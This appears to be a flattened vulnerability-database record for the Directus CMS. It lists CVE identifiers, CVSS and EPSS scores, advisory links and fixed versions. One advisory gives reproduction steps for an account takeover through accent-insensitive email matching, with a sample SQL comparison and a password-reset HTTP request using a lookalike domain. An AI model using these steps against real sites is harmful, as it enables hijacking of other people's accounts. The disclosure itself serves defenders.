scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13
3
reference_url https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-28443
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-28443
5
reference_url https://github.com/advisories/GHSA-8vg2-wf3q-mwv7
reference_id GHSA-8vg2-wf3q-mwv7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8vg2-wf3q-mwv7
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7
reference_id GHSA-8vg2-wf3q-mwv7
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7
fixed_packages
0
url pkg:npm/directus@9.23.3
purl pkg:npm/directus@9.23.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-gjju-tu4e-gqfc
5
vulnerability VCID-hrqc-8err-4fbx
6
vulnerability VCID-jmem-8d4q-x7br
7
vulnerability VCID-kqs7-8txh-jyc8
8
vulnerability VCID-m3wb-sstx-v3d6
9
vulnerability VCID-msb5-197k-a3er
10
vulnerability VCID-wgag-36wa-qyay
11
vulnerability VCID-xc7t-gwaz-ckeu
12
vulnerability VCID-xt9c-32g5-mqes
13
vulnerability VCID-yutw-33sk-5fg3
14
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3
aliases CVE-2023-28443, GHSA-8vg2-wf3q-mwv7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eygf-cb4y-hqd3
8
url VCID-gjju-tu4e-gqfc
vulnerability_id VCID-gjju-tu4e-gqfc
summary 
Directus has MySQL accent insensitive email matching
## Password reset vulnerable to accent confusion

The password reset mechanism of the Directus backend is implemented in a way where combined with (specific, need to double check if i can work around) configuration in MySQL or MariaDB. As such, it allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. 

This is due to the fact that by default MySQL/MariaDB are configured for accent-insenstive and case-insensitve comparisons.

MySQL weak comparison:
```sql
select 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';
```

This is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.

### Steps to reproduce:

1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess)
2. A off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.
3. With this email the attacker can request a password reset for `julian@cüre53.de`. 
```http
POST /auth/password/request HTTP/1.1
Host: example.com
[...]
{"email":"julian@cüre53.de"}
```
4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.
5. With this email the attacker can log into the target account and use it for nefarious things

### Workarounds
Should be possible with collations but haven't been able to confirm this. 

### References
- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/
- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-27295
reference_id
reference_type
scores
0
value 0.00604
scoring_system epss
scoring_elements 0.69922
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-27295
1
reference_url https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919
4
reference_url https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-27295
reference_id CVE-2024-27295
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-27295
6
reference_url https://github.com/advisories/GHSA-qw9g-7549-7wg5
reference_id GHSA-qw9g-7549-7wg5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qw9g-7549-7wg5
7
reference_url https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5
reference_id GHSA-qw9g-7549-7wg5
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/
url https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5
fixed_packages
0
url pkg:npm/directus@10.8.3
purl pkg:npm/directus@10.8.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-msb5-197k-a3er
6
vulnerability VCID-wgag-36wa-qyay
7
vulnerability VCID-xc7t-gwaz-ckeu
8
vulnerability VCID-xt9c-32g5-mqes
9
vulnerability VCID-yutw-33sk-5fg3
10
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3
aliases CVE-2024-27295, GHSA-qw9g-7549-7wg5
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gjju-tu4e-gqfc
9
url VCID-gpfk-nsnr-4khn
vulnerability_id VCID-gpfk-nsnr-4khn
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-23080
reference_id
reference_type
scores
0
value 0.00116
scoring_system epss
scoring_elements 0.30093
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-23080
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-23080
reference_id CVE-2022-23080
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-23080
4
reference_url https://www.mend.io/vulnerability-database/CVE-2022-23080
reference_id CVE-2022-23080
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.mend.io/vulnerability-database/CVE-2022-23080
5
reference_url https://github.com/advisories/GHSA-5h75-pvq4-82c9
reference_id GHSA-5h75-pvq4-82c9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5h75-pvq4-82c9
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-23080, GHSA-5h75-pvq4-82c9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gpfk-nsnr-4khn
10
url VCID-hrqc-8err-4fbx
vulnerability_id VCID-hrqc-8err-4fbx
summary 
Directus affected by VM2 sandbox escape vulnerability
### Impact
In vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the "Run Script" operation in flows being able to escape the sandbox running code in the main nodejs context.

### Patches
Patched in v10.6.0 by replacing `vm2` with `isolated-vm`

### Workarounds
None

### References
https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
references
0
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
1
reference_url https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058
2
reference_url https://github.com/directus/directus/pull/19332
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/pull/19332
3
reference_url https://github.com/advisories/GHSA-22rr-f3p8-5gf8
reference_id GHSA-22rr-f3p8-5gf8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-22rr-f3p8-5gf8
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8
reference_id GHSA-22rr-f3p8-5gf8
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8
5
reference_url https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
reference_id GHSA-cchq-frgv-rjh5
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
fixed_packages
0
url pkg:npm/directus@10.6.0
purl pkg:npm/directus@10.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-gjju-tu4e-gqfc
5
vulnerability VCID-kqs7-8txh-jyc8
6
vulnerability VCID-m3wb-sstx-v3d6
7
vulnerability VCID-msb5-197k-a3er
8
vulnerability VCID-n7m6-zecb-6qh2
9
vulnerability VCID-wgag-36wa-qyay
10
vulnerability VCID-xc7t-gwaz-ckeu
11
vulnerability VCID-xt9c-32g5-mqes
12
vulnerability VCID-yutw-33sk-5fg3
13
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0
aliases GHSA-22rr-f3p8-5gf8, GMS-2023-2358
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hrqc-8err-4fbx
11
url VCID-kqs7-8txh-jyc8
vulnerability_id VCID-kqs7-8txh-jyc8
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-6534
reference_id
reference_type
scores
0
value 0.00058
scoring_system epss
scoring_elements 0.18294
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-6534
1
reference_url https://directus.io
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://directus.io
2
reference_url https://fluidattacks.com/advisories/capaldi
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/
url https://fluidattacks.com/advisories/capaldi
3
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
reference_id CVE-2024-6534
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-6534
5
reference_url https://directus.io/
reference_id directus.io
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/
url https://directus.io/
6
reference_url https://github.com/advisories/GHSA-3fff-gqw3-vj86
reference_id GHSA-3fff-gqw3-vj86
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3fff-gqw3-vj86
7
reference_url https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86
reference_id GHSA-3fff-gqw3-vj86
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86
fixed_packages
0
url pkg:npm/directus@10.13.2
purl pkg:npm/directus@10.13.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-m3wb-sstx-v3d6
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-msb5-197k-a3er
3
vulnerability VCID-wgag-36wa-qyay
4
vulnerability VCID-xt9c-32g5-mqes
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2
aliases CVE-2024-6534, GHSA-3fff-gqw3-vj86
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kqs7-8txh-jyc8
12
url VCID-m3wb-sstx-v3d6
vulnerability_id VCID-m3wb-sstx-v3d6
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-24353
reference_id
reference_type
scores
0
value 0.00347
scoring_system epss
scoring_elements 0.57503
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-24353
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804
3
reference_url https://github.com/directus/directus/pull/23716
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/pull/23716
4
reference_url https://github.com/directus/directus/releases/tag/v11.2.0
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/releases/tag/v11.2.0
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-24353
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-24353
7
reference_url https://www.youtube.com/watch?v=DbV4IxbWzN4
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/
url https://www.youtube.com/watch?v=DbV4IxbWzN4
8
reference_url https://github.com/advisories/GHSA-pmf4-v838-29hg
reference_id GHSA-pmf4-v838-29hg
reference_type
scores
url https://github.com/advisories/GHSA-pmf4-v838-29hg
fixed_packages
0
url pkg:npm/directus@11.2.0
purl pkg:npm/directus@11.2.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-bjzg-mzjf-cfau
1
vulnerability VCID-m5ng-dsfx-6qev
2
vulnerability VCID-wgag-36wa-qyay
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0
aliases CVE-2025-24353, GHSA-pmf4-v838-29hg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m3wb-sstx-v3d6
13
url VCID-msb5-197k-a3er
vulnerability_id VCID-msb5-197k-a3er
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46990
reference_id
reference_type
scores
0
value 0.00237
scoring_system epss
scoring_elements 0.46944
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46990
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b
3
reference_url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52
4
reference_url https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff
5
reference_url https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/
url https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46990
reference_id CVE-2024-46990
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46990
7
reference_url https://github.com/advisories/GHSA-68g8-c275-xf2m
reference_id GHSA-68g8-c275-xf2m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-68g8-c275-xf2m
8
reference_url https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m
reference_id GHSA-68g8-c275-xf2m
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
